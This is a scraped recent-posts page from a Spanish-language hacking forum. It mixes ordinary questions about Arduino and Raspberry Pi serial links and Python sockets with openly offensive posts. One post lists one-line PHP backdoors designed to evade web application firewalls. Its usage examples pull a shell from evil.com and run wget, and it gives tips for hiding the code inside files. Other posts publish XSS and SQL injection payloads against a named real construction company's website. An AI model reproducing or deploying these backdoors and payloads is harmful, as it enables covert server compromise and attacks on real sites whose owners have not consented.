comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mensajes recientes

Páginas: [1] 2 3 ... 10
1
Hacking ShowOff / Re:[XSS] Dynasty Builders - http://www.dynastybuilders.ca/
« Último mensaje por Nobody en Hoy a las 11:10:22 pm »
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!
2
No sé si te entendí bien, pero tanto la raspberry y el arduino como dices, soportan la comunicación serial, y no es necesario el cable USB puesto que ambos trabajan con los mismos rangos de voltaje, por lo que lo único que tienes que hacer es simplemente colocar el rx de uno en el tx del otro y viceversa.

Ahora, si puedes hacer exactamente lo mismo, pero ten en cuenta que debes enviar la información de los GPIO por el puerto serie y ya en el arduino, recibes e interpretas.

Saludos.
3
Python / Re:Tutorial envio de archivos usando sockets
« Último mensaje por Once en Hoy a las 10:52:36 pm »
Hola jcamiloce10, mira que el mismo error te lo está diciendo, no puedes enviar una lista, puedes enviar un string, lo que implica que para enviar la lista debes hacerlo elemento por elemento.

Ahora, mencionas un sensor, explícame mejor que es lo que estás intentando hacer (o crea un post nuevo) así te puedo ayudar mejor, puesto que si vas a usar un sensor, lo que vas a necesitar es, probablemente, usar el protocolo serial. Así que, por favor, danos más información.

Saludos.
4
Shells / [PHP] Lista de backdoors inúsuales [WAF Bypass].
« Último mensaje por Nobody en Hoy a las 10:34:35 pm »
¡Hola a todos! ¿Cómo les va?

Estoy al tanto de la creciente necesidad de backdoors fáciles de camuflar y con capacidades para evadir Web Application Firewalls —WAF, de ahora en más—. Por lo cual, mediante esta publicación, les ofrezco una lista de backdoors de tan solo una línea, capaces de evadir WAF.

Advertencia: En esta lista no incluiré funciones obsoletas a partir de PHP 7.2.
Referencia: You are not allowed to view links. Register or Login

1. copy() - Requiere: allow_url_fopen. (nunca antes la vi, se me ocurrió recientemente)
Código: PHP
  1. <?php You are not allowed to view links. Register or Login($_GET['s'], $_GET['d']);
Citar
¿CÓMO UTILIZAR?
file.php?s=http://evil.com/shell.txt&d=/var/www/shell.php

2. include() - Requiere: allow_url_fopen.
Código: PHP
  1. <?php include($_GET['x']);
Citar
¿CÓMO UTILIZAR?
file.php?x=http://evil.com/shell.php
Advertencia: Obtuve mejores resultados utilizando un servidor HTTP sin PHP, por ejemplo, en Python.

3. popen() - DETECTADA POR You are not allowed to view links. Register or Login.
Código: PHP
  1. <?php echo You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($_GET['c'],'r'),1024*4);
Citar
¿CÓMO UTILIZAR?
file.php?c=wget -O shell.php You are not allowed to view links. Register or Login
Advertencia: Aún siendo detectada, es mi favorita y funciona excelente.

4. file_put_contents()
Código: PHP
  1. <?php You are not allowed to view links. Register or Login('_c.php','<?php '.$_GET['c'].' ?>'); include '_c.php'; You are not allowed to view links. Register or Login("_c.php");
Citar
¿CÓMO UTILIZAR?
file.php?c=system('wget -O shell.php You are not allowed to view links. Register or Login
Advertencia: unlink() es opcional, pues yo lo uso para no dejar un archivo con el código ejecutado.

SUGERENCIAS
Citar
1. Se puede anteponer @ en alguna función, para así evitar imprimir los errores de la misma. Esto es útil a la hora de esconder el backdoor dentro de un archivo.
2. Se puede reemplazar $_GET por $_REQUEST, así aceptando GET, POST y COOKIE como métodos de entrada.
3. Se puede utilizar isset() y __halt_compiler() para obtener una salida más limpia a la hora de esconder el backdoor dentro de un archivo.
Citar
<?php if(isset($_GET['c']))echo fread(popen($_GET['c'],'r'),1024*4); __halt_compiler();
4. El tag de cierre de PHP no es necesario en un archivo que solo contenga código. Así mismo, se puede utilizar short tags, si éstos están habilitados.

Pues nada más... En realidad, es un post sencillito, pero seguramente a alguien le será útil  :)

Salutes,
Nobody.
5
Hacking ShowOff / [XSS] Dynasty Builders - http://www.dynastybuilders.ca/
« Último mensaje por Drok3r en Hoy a las 07:53:09 pm »
    Captura de pantalla


    Url del sitio


    Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:

----> You are not allowed to view links. Register or Login

    Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)

    Reportado: SI
6
Python / Re:Tutorial envio de archivos usando sockets
« Último mensaje por jcamiloce10 en Hoy a las 06:20:52 pm »
Hola disculapame estoy itentando enviar esto datos = [1,2,3,4....8000] solo es una prueba pues nesesito hacer lo mismo con unos datos que vienen de un sensor, mas o menos 8mil datos por segundo, mi preugunta es, como lo hago puesto que cuando intento enviar la prueba que mostre anteriormente, me sale el siguiente error "sendall() argument 1 must be string or buffer, not list", y la verdad no se que hacer, espero puedas ayudarme
7
Pues... es un extasis reportar algo y que mejor que ayudar a que la tecnologia sea mas segura. Pero como todo, no todo el tiempo suceden cosas "buenas" por tal motivo algunos prefieren reportar desde dos puntos, el anonimo y en bugbounty.

Anonimo: mandar un correo electronico a la cuenta de admin del sitio, utilizando un monton de tecnicas y juguetes para "mantener" el "anonimato.

BugBounty: Los caza recompenzas que estan detras de los miles de millones de programas donde te pagan por reportar vulnerabiliades.

Algo es seguro, en la mayoria de los casos... no te haran caso, no te daran ni las gracias (aunque solucionen la falla o la vulnerabilidad) y en ocaciones mas minimas te daran algo (reconocimiento, dinero, un producto, etc...)

Algo que te recomiendo es que hagas un buen reporte tecnico sobre la vulnerabilidad y seas muy especifico en el "como explotarla", en las POC.

Mis reportes:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
8
GNU/Linux / Re:guia de linux para bebes
« Último mensaje por invasor_zim en Hoy a las 01:51:40 pm »
Soy nuevo en ubuntu  y la verdad me sirvio mucho  ;)
9
Hola a todos!! ;) , tengo una duda que no soy capaz de resolver y creo que este es el sitio más indicado para encontrar la respuesta.

Tengo un proyecto en el que una Raspberry se comunica con un Arduino nano mediante los GPIO de las Raspberry, esto lo hago cableando los GPIO de las Raspberry a las entradas digitales del Arduino nano y cuando detecto que se ponen en HIGH o LOW las uso en el mi sketch. Mi pregunta es la siguiente:

 ¿Se puede hacer lo mismo usando un cable USB haciendo uso de la comunicación serie entre las dos placas?  Lo que pretendo es que por ejemplo cuando se active el GPIO 10 de la Raspberry el Arduino sepa que está activo ese GPIO  y actuará en consecuencia y si está apagado ese GPIO que actúe de otra manera, todo esto quiero que ocurra conectando las dos placas mediante un cable USB.

He visto tutoriales sobre como activar la comunicación serie entre el Arduino y la Raspberry pero no se explica nada sobre como usar las activaciones de los GPIO y compartir su estado para usarlos en mi sketch de Arduino.

Gracias y un saludo.
10

You are not allowed to view links. Register or Login


Saludos

Gabriela
Páginas: [1] 2 3 ... 10